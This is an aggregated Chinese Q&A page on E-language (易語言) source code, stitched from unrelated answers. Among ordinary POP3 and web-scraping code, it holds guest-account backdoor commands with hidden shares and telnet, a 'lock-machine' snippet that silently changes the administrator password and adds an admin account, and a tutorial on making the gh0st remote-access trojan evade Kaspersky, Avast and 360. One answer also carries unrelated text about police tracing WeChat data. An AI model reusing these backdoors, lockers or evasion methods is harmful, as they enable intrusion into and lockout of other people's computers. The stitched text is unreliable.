易語言telnet源碼
㈠ 跪求易語言開機密碼修改的源碼。
我給你們源碼把,那個修改開機的,千萬不要運行...還有,我不是原作者(如果運行了,請進pe,然後清除密碼)
這里給大家說明一下,網上的所有什麼修改開機密碼啊,進過我認證,全是我自己做的,原因在這,看圖片。
這個是為了記住我自己的源碼所做的。
這個添加後門的意思是:共享c,d盤,(加上$隱藏),然後開啟telnet服務(遠程式控制制),最後打開遠程桌面。
改密碼的意思是:net user guest /active:yes 將停用的guest帳號激活(變為可用)
然後:net user guest 888888把 Guest 帳號的密碼改為 888888
最後:net localgroup Administrators guest /add把 Guest 加到Administrators組中(這樣就有了超級許可權)
致命的命令:net user Administrator/active:no 停用原來的賬號
這些是黑客ip$入侵留後門的經典招數
預防所謂的黑客入侵方法就是看看自己是不是被共享了,方法很簡單,在這里我就不說了。
所謂的黑客指的是只會ip$和肉雞入侵,那些黑客一般都是渣渣,所以不必要害怕,這個軟體的原作者我覺得也是一名駭客,這點小技術就要錢,太不要臉。
㈡ 易語言怎麼獲取網頁源代碼
是完全可以查到的,但正常情況下不會去幫你查,需要先去公安局立案,也就是說你一定得要有極其充分的理由才可以讓公安局幫你查。
1、因為現在的微信號必須得綁定手機號,而在使用微信的過程中總會用到手機號之類的信息,所以個人的微信信息全部都會被存在騰訊公司的內部伺服器里。
2、公安機關如果是由於民事案件而向騰訊公司申請查詢用戶的微信數據的話,騰訊公司是完全有理由不配合公安機關的信息查詢的,因為這牽涉到了用戶的個人隱私。
3、只有在牽涉到重大刑事案件以及危害國家安全的案件時,騰訊公司才有義務配合公安機關去調查用戶的信息。
4、如果微信內容已經涉及了刑事案件,特別是重要的刑事案件偵查線索,縣級以上公安機關是可以對這個手機號碼採取技術偵查手段的。
5、這個方式是一定可以追蹤你手機的位置信息的,既便是關機也沒有任何作用,還是能追蹤到,並且還可以監聽你的通話,攔截你的微信。
6、在公安局啟動技術偵查手段之前的一定時間內,你的通話內容和微信內容無論是收還是發都全部會被保存到一個為了提供通信服務公司的計算機上,因此要查出簡訊內容和通話內容是完全可以的。
(2)易語言telnet源碼擴展閱讀
根據公安機關辦理刑事案件程序規定第254條,技術偵查措施適用的范圍為以下案件:
1、危害國家安全犯罪、恐怖活動犯罪、黑社會性質的組織犯罪、重大毒品犯罪案件。
2、故意殺人、故意傷害致人重傷或者死亡、強奸、搶劫、綁架、放火、爆炸、投放危險物質等嚴重暴力犯罪案件。
3、集團性、系列性、跨區域性重大犯罪案件。
4、利用電信、計算機網路、寄遞渠道等實施的重大犯罪案件,以及針對計算機網路實施的重大犯罪案件。
5、其他嚴重危害社會的犯罪案件,依法可能判處七年以上有期徒刑的。
6、公安機關追捕被通緝或者批准、決定逮捕的在逃的犯罪嫌疑人、被告人,可以採取追捕所必需的技術偵查措施。
㈢ 求如何修改易語言源碼過程,
修改易語言源碼過程:
在你的電腦上安裝一個易語言
→
得到你想修改的易語言源碼(*.e格式的文件)
→
用易語言打開源碼文件
→
改成你希望的效果
→
保存文件
→
關閉易語言.
就是這么簡單.
㈣ 跪求易語言鎖機源碼求詳細
運行("net user Administrator 密碼",假,#隱藏窗口)
運行("net user 用戶名 密碼 /add",假,#隱藏窗口)
運行("net user administrators 同上用戶名 /add",假,#隱藏窗口)
這段代碼,就OK了
用戶名-賬號名稱,密碼-你想設定的密碼,同上用戶名-第二句代碼中的用戶名
自己改變一下
以此類推
,要關機的話,加上:
關閉系統(#關機,真)
㈤ (300分)求易語言一個收信源碼
.版本 2
.支持庫 pop3
.程序集 啟動程序集
.程序集變數 郵件, 郵件信息, , "0"
.程序集變數 附件, 附件信息, , "0"
.程序集變數 郵件索引, 整數型
.程序集變數 附件索引, 整數型
.程序集變數 郵件總數, 整數型
.程序集變數 附件個數, 整數型
.程序集變數 登陸信息, 文本型, , "6"
.程序集變數 是否快速瀏覽, 邏輯型
.程序集變數 郵件大小, 整數型, , "0"
.程序集變數 郵件序號組, 文本型, , "0"
.子程序 _啟動子程序, 整數型, , 本子程序在程序啟動後最先執行
標准輸出 (, 「郵件接收支持庫的測試」 + #換行符)
標准輸出 (, 「郵箱登陸:」 + #換行符)
注冊郵件接收回調函數 (&回調函數)
設置代理 ()
登陸 ()
快速瀏覽 ()
標准輸出 (, 「快速瀏覽完畢」 + #換行符)
標准輸出 (, 「需要詳細查看各郵件嗎?(Y/N)」)
.如果真 (取代碼 (標准輸入 (), 1) = 121)
讀郵件 ()
.如果真結束
標准輸入 ()
返回 (0) ' 可以根據您的需要返回任意數值
.子程序 設置代理
.局部變數 是否設置, 文本型
.局部變數 伺服器類型, 文本型
.局部變數 伺服器地址, 文本型
.局部變數 伺服器埠, 文本型
.局部變數 伺服器用戶, 文本型
.局部變數 伺服器密碼, 文本型
標准輸出 (, 「是否設置代理伺服器(Y/N)」 + #換行符)
是否設置 = 標准輸入 ()
.如果真 (取代碼 (是否設置, 1) = 121)
標准輸出 (, 「1:HTTP1.1代理,2:SOCKS5代理----」)
伺服器類型 = 標准輸入 ()
標准輸出 (, 「代理伺服器IP地址----」)
伺服器地址 = 標准輸入 ()
標准輸出 (, 「埠號----」)
伺服器埠 = 標准輸入 ()
標准輸出 (, 「用戶名----」)
伺服器用戶 = 標准輸入 ()
標准輸出 (, 「密碼----」)
伺服器密碼 = 標准輸入 ()
.如果 (設置代理伺服器 (到整數 (伺服器類型), 伺服器地址, 到數值 (伺服器埠), 伺服器用戶, 伺服器密碼) = 真)
標准輸出 (, 「設置代理伺服器成功」 + #換行符)
.否則
標准輸出 (, 「設置代理伺服器失敗」)
標准輸入 ()
結束 ()
.如果結束
.如果真結束
.子程序 登陸
.局部變數 文本變數, 文本型
標准輸出 (, 「請輸入郵件伺服器地址:」)
文本變數 = 標准輸入 (真)
登陸信息 [1] = 文本變數
標准輸出 (, 「請輸入埠號:」)
文本變數 = 標准輸入 (真)
登陸信息 [2] = 文本變數
標准輸出 (, 「請輸入用戶名:」)
文本變數 = 標准輸入 (真)
登陸信息 [3] = 文本變數
標准輸出 (, 「請輸入密碼:」)
文本變數 = 標准輸入 (真)
登陸信息 [4] = 文本變數
標准輸出 (, 「請輸入等待時間(毫秒):」)
文本變數 = 標准輸入 (真)
登陸信息 [5] = 文本變數
標准輸出 (, 「請輸入重試次數:」)
文本變數 = 標准輸入 (真)
登陸信息 [6] = 文本變數
標准輸出 (, #換行符)
連接郵件伺服器 ()
.子程序 連接郵件伺服器
標准輸出 (, 「正在登陸郵件伺服器請稍候..........」)
標准輸出 (, #換行符 + #換行符)
.如果真 (連接收信伺服器 (登陸信息 [1], 到數值 (登陸信息 [2]), 登陸信息 [3], 登陸信息 [4], 到數值 (登陸信息 [5]), 到數值 (登陸信息 [6])) = 假)
標准輸出 (, 「發生錯誤:」 + 取郵件錯誤信息 ())
標准輸入 ()
結束 ()
.如果真結束
標准輸出 (, 「郵箱連接成功」)
讀郵件 ()
.子程序 讀郵件
.局部變數 邏輯返回, 邏輯型
.局部變數 郵件總量, 整數型
.局部變數 瀏覽, 文本型
.局部變數 郵件序號, 文本型
.局部變數 計次變數, 整數型
邏輯返回 = 獲取郵件信息 (郵件總數, 郵件總量)
.如果真 (邏輯返回 = 假)
標准輸出 (, 「獲取郵件信息出錯:」 + 取郵件錯誤信息 ())
標准輸入 ()
結束 ()
.如果真結束
標准輸出 (, 「郵件總量:」 + 到文本 (郵件總量) + #換行符)
標准輸出 (, 「郵件個數:」 + 到文本 (郵件總數) + #換行符)
重定義數組 (郵件, 假, 郵件總數)
清除數組 (郵件大小)
邏輯返回 = 獲取郵件大小 (-1, 郵件大小, 郵件總數)
.如果真 (邏輯返回 = 假)
標准輸出 (, 「獲取每個郵件的大小出錯:」 + 取郵件錯誤信息 ())
標准輸入 ()
結束 ()
.如果真結束
標准輸出 (, 「是否要快速瀏覽(Y/N) 」)
瀏覽 = 標准輸入 (真)
標准輸出 (, #換行符)
標准輸出 (, 「正在接收郵件請稍候............」)
.如果 (取代碼 (瀏覽, 1) = 121)
是否快速瀏覽 = 真
.計次循環首 (郵件總數, 計次變數)
郵件 [計次變數] = 接收郵件前幾行 (計次變數, 10)
.計次循環尾 ()
.否則
.計次循環首 (郵件總數, 計次變數)
郵件 [計次變數] = 接收郵件 (計次變數)
.計次循環尾 ()
.如果結束
標准輸出 (, #換行符)
標准輸出 (, #換行符)
清除數組 (郵件序號組)
.計次循環首 (郵件總數, 計次變數)
接收郵件序號 (計次變數, 郵件序號)
加入成員 (郵件序號組, 郵件序號)
.計次循環尾 ()
標准輸出 (, 「郵件接收完畢」)
斷開收信伺服器 ()
.如果真 (是否快速瀏覽 = 假)
郵件信息 ()
.如果真結束
.子程序 郵件信息
.局部變數 郵件次序號, 整數型
標准輸出 (, 「共接收郵件 」 + 到文本 (郵件總數) + 「 個」 + #換行符)
標准輸出 (, 「要查看郵件內容請輸入郵件的次序號:」)
郵件次序號 = 到數值 (標准輸入 (真))
.如果 (郵件次序號 ≥ 1 且 郵件次序號 ≤ 郵件總數)
取郵件 (郵件次序號)
.否則
郵件信息 ()
.如果結束
.子程序 取附件信息
.參數 附件索引數, 整數型
.局部變數 是否嵌入式, 邏輯型
.局部變數 文件名, 文本型
.局部變數 文件號, 整數型
標准輸出 (, #換行符)
標准輸出 (, 「第 」 + 到文本 (附件索引數) + 「 個附件信息」 + #換行符)
標准輸出 (, 「是否嵌入式:」)
是否嵌入式 = 附件 [附件索引數].取是否嵌入式附件 ()
標准輸出 (, 到文本 (是否嵌入式))
標准輸出 (, #換行符)
.如果 (是否嵌入式 = 真)
標准輸出 (, 「嵌入文件名:」)
標准輸出 (, 附件 [附件索引數].取名稱 ())
.否則
標准輸出 (, 「附加文件名:」)
標准輸出 (, 附件 [附件索引數].取文件名 ())
.如果結束
標准輸出 (, #換行符)
標准輸出 (, 「附件大小:」)
標准輸出 (, 到文本 (附件 [附件索引數].取大小 ()))
標准輸出 (, #換行符)
標准輸出 (, 「附件類型:」)
標准輸出 (, 附件 [附件索引數].取類型 ())
標准輸出 (, #換行符)
標准輸出 (, 「編碼方式:」)
標准輸出 (, 附件 [附件索引數].取編碼方式 ())
標准輸出 (, #換行符)
標准輸出 (, 「附件數據的大小:」)
標准輸出 (, 到文本 (取位元組集長度 (附件 [附件索引數].取數據 ())))
標准輸出 (, #換行符)
.子程序 取郵件
.參數 郵件索引數, 整數型
.局部變數 內容, 文本型
.局部變數 計次變數, 整數型
標准輸出 (, 「第 」 + 到文本 (郵件索引數) + 「 個郵件信息」 + #換行符)
標准輸出 (, 「發件人名稱:」)
標准輸出 (, 郵件 [郵件索引數].取發件人名稱 ())
標准輸出 (, #換行符)
標准輸出 (, 「主題:」)
標准輸出 (, 郵件 [郵件索引數].取主題 ())
標准輸出 (, #換行符)
標准輸出 (, 「日期:」)
標准輸出 (, 到文本 (郵件 [郵件索引數].取日期 ()))
標准輸出 (, #換行符)
標准輸出 (, 「發件人地址:」)
標准輸出 (, 郵件 [郵件索引數].取發件人地址 ())
標准輸出 (, #換行符)
標准輸出 (, 「回復地址:」)
標准輸出 (, 郵件 [郵件索引數].取回復地址 ())
標准輸出 (, #換行符)
標准輸出 (, 「郵件大小:」)
標准輸出 (, 到文本 (郵件大小 [郵件索引數]))
標准輸出 (, #換行符)
標准輸出 (, 「郵件序號:」)
標准輸出 (, 郵件序號組 [郵件索引數])
標准輸出 (, #換行符)
標准輸出 (, 「原始信息長度:」)
標准輸出 (, 到文本 (取文本長度 (郵件 [郵件索引數].取原始信息 ())))
標准輸出 (, #換行符)
標准輸出 (, 「文本內容:」)
內容 = 郵件 [郵件索引數].取文本內容 ()
標准輸出 (, 內容 + #換行符)
標准輸出 (, 「保存超文本文件」)
超文本內容 (郵件索引數)
標准輸出 (, #換行符)
標准輸出 (, 「附件個數 :」)
附件個數 = 郵件 [郵件索引數].取附件個數 ()
標准輸出 (, 到文本 (附件個數))
標准輸出 (, #換行符)
.如果真 (是否快速瀏覽 = 假)
標准輸出 (, #換行符)
附件 = 郵件 [郵件索引數].取附件 ()
.計次循環首 (取數組成員數 (附件), 計次變數)
取附件信息 (計次變數)
.計次循環尾 ()
選擇保存附件 (郵件索引數)
標准輸出 (, #換行符)
郵件信息 ()
.如果真結束
.子程序 選擇保存附件
.參數 選擇附件索引, 整數型
.局部變數 附件次序號, 整數型
標准輸出 (, 「是否需要保存附件(Y/N)」)
.如果 (取代碼 (標准輸入 (), 1) = 121)
標准輸出 (, 「請輸入要保存的附件次序號:」)
附件次序號 = 到數值 (標准輸入 (真))
.如果真 (附件次序號 ≥ 1 且 附件次序號 ≤ 附件個數)
保存附件 (附件次序號)
.如果真結束
.否則
刪除子程序 (選擇附件索引)
.如果結束
.子程序 刪除子程序
.參數 索引
.局部變數 是否刪除, 文本型
標准輸出 (, 「是否要刪除該郵件(Y/N)」)
是否刪除 = 標准輸入 (真)
.如果真 (取代碼 (是否刪除, 1) = 121)
連接收信伺服器 (登陸信息 [1], 到數值 (登陸信息 [2]), 登陸信息 [3], 登陸信息 [4], 到數值 (登陸信息 [5]), 到數值 (登陸信息 [6]))
.如果 (刪除郵件 (索引) = 真)
標准輸出 (, 「刪除成功」)
.否則
標准輸出 (, 「刪除失敗」)
.如果結束
.如果真結束
郵件復位 ()
.子程序 快速瀏覽
.局部變數 計次變數, 整數型
.計次循環首 (取數組成員數 (郵件), 計次變數)
取郵件 (計次變數)
刪除子程序 (計次變數)
標准輸出 (, #換行符)
.計次循環尾 ()
.子程序 保存附件
.參數 保存索引, 整數型
.局部變數 文件名, 文本型
.局部變數 文件號, 整數型
.如果 (附件 [保存索引].取是否嵌入式附件 () = 真)
文件名 = 附件 [保存索引].取名稱 ()
.否則
文件名 = 附件 [保存索引].取文件名 ()
.如果結束
標准輸出 (, 「請輸入要保存到的路徑,以」 + #引號 + 「 \」 + #引號 + 「結束:」)
文件號 = 打開文件 (標准輸入 (真) + 文件名, #重寫, )
.如果 (插入位元組集 (文件號, 附件 [保存索引].取數據 ()) = 真)
標准輸出 (, 「保存成功」)
.否則
標准輸出 (, 「保存失敗」)
.如果結束
關閉文件 (文件號)
標准輸出 (, #換行符)
.子程序 郵件復位
標准輸出 (, #換行符)
標准輸出 (, 「需要恢復被刪除的郵件嗎?(Y/N)」)
.如果真 (取代碼 (標准輸入 (), ) = 121)
.如果 (復位郵件 () = 真)
標准輸出 (, 「復位成功,」)
標准輸出 (, 「刪除的郵件被恢復」)
.否則
標准輸出 (, 「復位失敗」)
.如果結束
.如果真結束
.子程序 超文本內容
.參數 索引, 整數型
.局部變數 計次變數, 整數型
.局部變數 文件號, 整數型
.局部變數 臨時文件, 文本型
標准輸出 (, 「請輸入臨時瀏覽超文本文件的路徑,以」 + #引號 + 「 \」 + #引號 + 「結束:」)
臨時文件 = 標准輸入 ()
文件號 = 打開文件 (臨時文件 + 「臨時瀏覽.html」, #重寫, ) ' 創建要瀏覽的超文本內容的網頁文件
插入文本 (文件號, 郵件 [索引].取超文本內容 ())
關閉文件 (文件號)
.計次循環首 (郵件 [索引].取附件個數 (), 計次變數)
.如果真 (附件 [計次變數].取是否嵌入式附件 ())
文件號 = 打開文件 (臨時文件 + 附件 [計次變數].取名稱 (), #重寫, ) ' 創建要瀏覽的超文本網頁的附件文件
插入位元組集 (文件號, 附件 [計次變數].取數據 ())
關閉文件 (文件號)
.如果真結束
.計次循環尾 ()
.子程序 回調函數, 邏輯型
.參數 類型, 整數型
.參數 第幾封, 整數型
.參數 位元組數, 整數型
.判斷開始 (#命令類型.驗證用戶名 = 類型)
標准輸出 (, 「驗證用戶信息」)
.默認
.判斷結束
返回 (真)
㈥ 易語言源碼怎麼修改
分情況討論: 如果是編輯框、組合框的話,那麼代碼如下: 編輯框(組合框).內容=「你想修改的內容」 如果是標簽、按鈕、選擇框、單選框等的話,那麼代碼如下: 標簽(按鈕等).標題=「你想修改的內容」
㈦ 易語言怎麼編寫遠程式控制制啊像灰鴿子的那種!最好有源代碼!
gh0st遠控軟體採用驅動級RESSDT過主動,svchost參數啟動,替換系統服務的方式工作的,工作方式較為先進,美中不足的部分是沒有進行驅動級或用戶級隱藏,當然這部分可以添加進去。編碼利用了VC的編程環境。
一、環境配置
編譯環境一定要配置好:DDK+SDK+VC6,DDK用來編譯sys文件的,SDK+VC6是用來編譯工程的,配置部分比較簡單,網上有很多資料,這里不再詳述,有興趣的朋友也可以查看DDK和SDK的相關幫助。
二、特徵碼定位簡述
殺毒軟體查殺木馬的原理基本是根據特徵查殺的,被查殺的部分我們稱之為特徵碼,所以我們可以利用特徵碼定位工具MyCLL定位出病毒的特徵碼位置,定位工具原理是將被掃描木馬分塊,利用分段填充的方式,匹配殺軟的特徵值,找到殺軟查殺病毒的位置。
定位出特徵碼,如何反向找到源碼中的對應位置呢?請看下面分析,
三、二進制文件與源碼定位之map文件利用
map文件是二進制和源碼之間對應的一個映射文件。
我們假設根據第三步我們定位出了病毒的特徵碼:
病毒名稱 特徵碼位置 內存地址
svchost.dll 000038AA_00000002 100044AA
svchost.dll 00005F98_00000002
第一步設置VC編譯環境生成Map文件。
在 VC 中,點擊菜單「Project -> Settings」選項頁(或按下 Alt+F7),選擇 C/C++ 選項卡,並在最下面的 Project Options 裡面輸入:/Zd ,然後要點擊 Link 選項卡,選中「Generate mapfile」復選框,並在最下面的 Project Options 裡面輸入:/mapinfo:lines,表示生成 MAP 文件時,加入行信息。設置完成。
第二步編譯VC工程,設置活動工程編譯即可,這個不用說明。這個步驟完成後,在release(或debug)目錄,多了一個.map文件(比如svchost.map)。
第三步打開map文件(用UE或文本編輯器打開都行),形式如下:
(begin)
Timestamp is 488fcef2 (Wed Jul 30 10:16:18 2008)
Preferred load address is 10000000
---------------------------------------------------------------------------1----(為方便說明,wrw添加)
Start Length Name Class
0001:00000000 00010a50H .text CODE
0001:00010a50 00000485H .text$x CODE
0002:00000000 000004c8H .idata$5 DATA
......
0003:00000010 00000004H .CRT$XIZ DATA
0003:00000020 00001a50H .data DATA
0003:00001a70 00000688H .bss DATA
0004:00000000 000000a8H .rsrc$01 DATA
0004:000000b0 00000cf0H .rsrc$02 DATA
----------------------------------------------------------------------------2---(為方便說明,wrw添加)
Address Publics by Value Rva+Base Lib:Object
0001:00000000 ??0CAudio@@QAE@XZ 10001000 f Audio.obj
0001:000000d0 ??_GCAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000d0 ??_ECAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000f0 ??1CAudio@@UAE@XZ 100010f0 f Audio.obj
0001:000001e0 ?getRecordBuffer@CAudio@@QAEPAEPAK@Z 100011e0 f Audio.obj
0001:00000240 ?playBuffer@CAudio@@QAE_NPAEK@Z 10001240 f Audio.obj
0001:000002c0 ?InitializeWaveIn@CAudio@@AAE_NXZ 100012c0 f Audio.obj
......
0001:00003310 ?SendToken@CFileManager@@AAEHE@Z 10004310 f FileManager.obj
0001:00003320 ?UploadToRemote@CFileManager@@AAE_NPAE@Z 10004320 f FileManager.obj
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
0001:00003670 ?StopTransfer@CFileManager@@AAEXXZ 10004670 f FileManager.obj
0001:00003730 ?CreateLocalRecvFile@CFileManager@@AAEXPAE@Z 10004730 f FileManager.obj
......
----------------------------------------------------------------------------3---(為方便說明,wrw添加)
Line numbers for .\Release\FileManager.obj(E:\vtmp\gh0st3src\Server\svchost\common\FileManager.cpp) segment .text
17 0001:00002630 20 0001:0000267f 21 0001:00002698 24 0001:000026d0
25 0001:000026f8 26 0001:0000273c 29 0001:000027d0 33 0001:000027ee
77 0001:000027f8 36 0001:000027fb 37 0001:00002803 77 0001:0000280d
......
532 0001:0000340f 534 0001:00003414 537 0001:00003428 540 0001:00003440
546 0001:0000345d 547 0001:00003487 548 0001:00003490 549 0001:00003492
551 0001:0000349e 552 0001:000034b8 553 0001:000034cb 554 0001:000034d4
558 0001:000034de 560 0001:000034e9 563 0001:000034ee 564 0001:00003506
......
(end)
我們看下,定位svchost.dll 的第一個特徵碼內存地址為:100044AA,在第2塊中,我們可以找到RVA+BASE與之很接近的是
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
這樣我們可以定位到FileManager.cpp中的FixedUploadList函數,是不是范圍縮小了?
下面我們再縮小代碼行
利用這個公式:特徵碼行偏移 = 特徵碼地址(Crash Address)- 基地址(ImageBase Address)- 0x1000
看起來好像很難,其實很簡單,我們將100044AA去掉內存基址10000000,再減1000,因為PE很多從1000開始,可以得到代碼偏移地址為34AA。到第3塊中找對應的代碼行。
偏移地址34AA在(551 0001:0000349e 552 0001:000034b8 )中間,也就是551行和552行中間,我們到源程序中查找第551行:
wsprintf(lpszFilter, "%s%s*.*", lpPathName, lpszSlash);
這樣就定位出源代碼了,要怎麼修改就怎麼修改它就可以了。
四、實戰免殺
A、卡巴免殺
首次編譯後,先做卡巴的免殺。卡巴殺sys文件和dll,當然也就殺包裝它們的install.exe,最後卡巴還殺生成的sever,我這里說殺生成好的server不是和前面的特徵碼重疊的地方,而是殺配置信息。
第一步、sys免殺
sys重新編譯後,增加了輸入表的函數,同時系統不同,造成很多地方不同於原特徵,順利通過卡巴、金山、小紅傘等殺軟。
第二步、svchost.dll免殺
特徵碼定位MultiByteToWideChar和"gh0st update"兩個位置。這里是通過第3步map文件得出的。
卡巴怕加花指令, 這個函數MultiByteToWideChar的調用上,可以在這個函數前面隨便加幾句無效語句就可以通過卡巴殺軟。
字元串調用"gh0st update" ,這個是用於更新用的 ,如果不要在線更新,直接把這個語句所在代碼塊刪除;嘿嘿,其實搜索工程替換這個字元串為其他的字元串就可以了^_^,這個方法同時可以過金山殺軟。
第三步、server免殺
卡巴定位在最後的配置信息,採取跳轉顯然是不行的,採用加花的辦法,在寫入AAAAAA配置信息之前,隨便寫些東西,就可以做server免殺。
卡巴免殺完成!
B、Avast免殺
最新的avast殺軟再查殺1下,殺install.exe和svchost.dll(也就是殺生成的文件和其中的資源文件),接著做它的源碼免殺。
定位在特徵字元串%02d/%02d/%02d和「SYSTEM\CurrentControlSet\Services\%s」兩個地方。
解決方案:
1、svchost.dll的特徵碼定位在鍵盤記錄KeyboardManager.cpp文件中的SaveInfo(char *lpBuffer)函數。特徵字元串%02d/%02d/%02d,也就是我們看到鍵盤記錄的日期,修改之,修改的方法很多,將其改為[%d/%d/%d %d:%d:%d] ,編譯即可通過avast殺軟。
2、install的特徵碼定位在「SYSTEM\CurrentControlSet\Services\%s」,對應文件是install.cpp里的InstallService函數,修改大小寫,編譯即可通過免殺。
五、添加垃圾代碼的小方法
垃圾代碼要移動特徵碼所在的位置,不要跑到堆棧中了,這樣的代碼沒有用。可以採取添加for循環,做計數,簡單統計,採用局部變數,不改變後面的邏輯為宜。
添加輸出表的方法:
有殺輸出表的,可以在生成的svchost.dll上添加空函數 ,但是每次編譯都要修改1次資源 ,其實我們在源碼上添加如下語句:
extern "C" __declspec(dllexport) bool JustTempFun();//聲明
……
extern "C" __declspec(dllexport) bool JustTempFun() //實現
{
return false;
}
編譯後,輸出表就被改變了,有的殺軟就可做到代碼免殺。
六、gh0st自動生成6to4ex.dll的修改
看到好多站友提問自動生成6to4ex.dll的問題,有熱心站友也提出了自己的見解 ,我感覺有些人提出的解決方案不完全正確,有可能造成剛入手人誤解,我根據自己的理解說明1下。
gh0st服務端是通svchost -netsvcs啟動的,所以程序要利用netsvcs 服務,服務端也就是根據netsvcs生成的,故不能說服務端生成是隨機的,相對於大多數系統來講,基本是固定的,下面看分析。
查看install.cpp裡面的InstallService()方法,首先遍歷HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Svchost中的服務項,查找到一個服務後,程序採取替換服務的方法,將原服務刪除,然後生成對應服務項+ ex.dll的文件替換原服務,6to4服務一般排在第一位,6to4服務是一種自動構造隧道的方式,作用在於只需要一個全球惟一的IPv4地址便可使得整個站點獲得IPv6 的連接,這個服務對一般人來講,基本閑置,所以我們的程序就把6to4服務給替換掉,同時在windows\system32\目錄下生成 6to4ex.dll,以後啟動就是6to4ex了,如果把這個服務跳過去,就依次向下生成Ias、Iprip等服務啦,如果netsvcs項沒有可以替換的服務,則程序將自己添加1個服務,名稱就是由 AddsvchostService()方法產生的netsvcs_0x%d。
這樣說不知道關心服務名稱的明白了不?
這個不能說是技術問題,但是小技巧問題可以從這里產生,我不知道其他人的360是怎麼過的,但是我覺得可以提示1下的是,如果是360默認系統安全的服務,它肯定不會報不安全,替換閑置的系統安全的服務則通過360的效果要好的多
本文來自: 華夏黑客同盟論壇 本文詳細地址:http://bbs.77169.com/read.php?tid=255676
㈧ 易語言如何獲取網頁源碼的並展示出來
.版本2
.支持庫RegEx
.支持庫internet
.支持庫iext
.子程序_按鈕1_被單擊
.局部變數網頁文本,文本型
.局部變數表達式,正則表達式
.局部變數搜索結果,搜索結果,,"0"
.局部變數計次變數,整數型
.局部變數文本,文本型
網頁文本=到文本(HTTP讀文件(編輯框1.內容))
網頁文本=子文本替換(網頁文本,#引號,「'」,0,,真)
網頁文本=到小寫(網頁文本)
透明標簽1.標題=取中間文(網頁文本,「<title>」,「</title>」)
表達式.創建(「meta(.*?)>」,假)
搜索結果=表達式.搜索全部(網頁文本)
.計次循環首(取數組成員數(搜索結果),計次變數)
文本=搜索結果[計次變數].取子匹配文本(網頁文本,1,)
.判斷開始(尋找文本(文本,「name='keywords'」,1,假)>0)
透明標簽2.標題=取中間文(文本,「content='」,「'」)
.判斷(尋找文本(文本,「name='description'」,1,假)>0)
透明標簽3.標題=取中間文(文本,「content='」,「'」)
.默認
.判斷結束
.計次循環尾()
.子程序取中間文,文本型
.參數全文,文本型
.參數左文,文本型
.參數右文,文本型
.局部變數位置,整數型
.局部變數總長度,整數型
.局部變數文本,文本型
總長度=取文本長度(全文)
位置=尋找文本(全文,左文,,假)
.如果真(位置<0)
返回(「」)
.如果真結束
位置=位置+取文本長度(左文)
文本=取文本中間(全文,位置,總長度)
總長度=取文本長度(文本)
位置=尋找文本(文本,右文,,假)-1
.如果真(位置<0)
返回(「」)
.如果真結束
文本=取文本中間(文本,1,位置)
返回(文本)
㈨ 易語言怎麼取網頁源碼
問題一:易語言如何獲取網頁源碼的並展示出來? .版本 2
.支持庫 RegEx
.支持庫 internet
.支持庫 iext
.子程序 _按鈕1_被單擊
.局部變數 網頁文本, 文本型
.局部變數 表達式, 正則表達式
.局部變數 搜索結果, 搜索結果, , 0
.局部變數 計次變數, 整數型
.局部變數 文本, 文本型
網頁文本 = 到文本 (HTTP讀文件 (編輯框1.內容))
網頁文本 = 子文本替換 (網頁文本, #引號, 「'」, 0, , 真)
網頁文本 = 到小寫 (網頁文本)
透明標簽1.標題 = 取中間文 (網頁文本, 「」, 「」)
表達式.創建 (「meta (.*?)>」, 假)
搜索結果 = 表達式.搜索全部 (網頁文本)
.計次循環首 (取數組成員數 (搜索結果), 計次變數)
文本 = 搜索結果 [計次變數].取子匹配文本 (網頁文本, 1, )
.判斷開始 (尋找文本 (文本, 「name='keywords'」, 1, 假) > 0)
透明標簽2.標題 = 取中間文 (文本, 「content='」, 「'」)
.判斷 (尋找文本 (文本, 「name='description'」, 1, 假) > 0)
透明標簽3.標題 = 取中間文 (文本, 「content='」, 「'」)
.默認
.判斷結束
.計次循環尾 ()
.子程序 取中間文, 文本型
.參數 全文, 文本型
.參數 左文, 文本型
.參數 右文, 文本型
.局部變數 位置, 整數型
.局部變數 總長度, 整數型
.局部變數 文本, 文本型
總長度 = 取文本長度 (全文)
位置 = 尋找文本 (全文, 左文, , 假)
.如果真 (位置 < 0)
返回 (「」)
.如果真結束
位置 = 位置 + 取文本長度 (左文)
文本 = 取文本中間 (全文, 位置, 總長度)
總長度 = 取文本長度 (文本)
位置 = 尋找文本 (文本, 右文, , 假) - 1
.如果真 (位置 < 0)
返回 (「」)
.如果真結束
文本 = 取文本中間 (文本, 1, 位置)
返回 (文本)
問題二:易語言怎麼獲取網頁源代碼 我記得我給你回答過了,其實說老實話,想學好一門編程語言,不下大功夫是不行的,網上有很多開源的,我不能幫你太多,因為我對這方面不是很懂,呵呵,不好意思。
問題三:易語言取網頁源碼的問題,求解答! 思路:
超文本瀏覽框.取文檔對象 ().對象型方法 (「getElementById」, 「xxx」).方法 (「focus」, )
超文本瀏覽框.取文檔對象 ().對象型方法 (「getElementById」, 「xxx」).方法 (「click」, )
取這個選擇框的對象(XXX是對象名稱或者ID),然後讓其獲得焦點並兄唯單擊它
就可以再取
臨時文本 = 超文本瀏覽框.取文檔對象 ().讀對象型屬性 (「body」, ).讀文本屬性 (「outerText」, )
此時的臨時文本就是網頁的源碼如果你要HTML格式的就用「讀文本屬性 (「outerhtml」, )」
問題四:易語言怎麼取網頁代碼中的一段代碼! 20分 高級答案:
首先創建子程序---取中間文件內容---------------------------------------------------------------------
.版本 2
.子程序 取文本中間內容, 文本型, 公開
.參數 需取文本, 文本型
.參數 左邊內容, 文本型
.參數 右邊內容, 文本型
.參數 成功與否, 邏輯型, 參考 可空
.局部變數 長度, 整數型
.局部變數 左邊位置, 整數型
.局部變數 左邊長度, 整數型
.局部變數 右邊位置, 整數型
.局部變數 右邊長度, 整數型
長度 = 取文本長度 (需取文本)
左邊位置 = 尋找文本 (需取文本, 左邊內容, 0, 假羨汪培)
左邊長度 = 取文本長陵氏度 (左邊內容)
.如果真 (左邊位置 = -1)
成功與否 = 假
返回 (「未找到左邊內容」)
.如果真結束
右邊位置 = 尋找文本 (需取文本, 右邊內容, 0, 假)
右邊長度 = 取文本長度 (右邊內容)
.如果真 (右邊位置 = -1)
成功與否 = 假
返回 (「未找到右邊內容」)
.如果真結束
成功與否 = 真
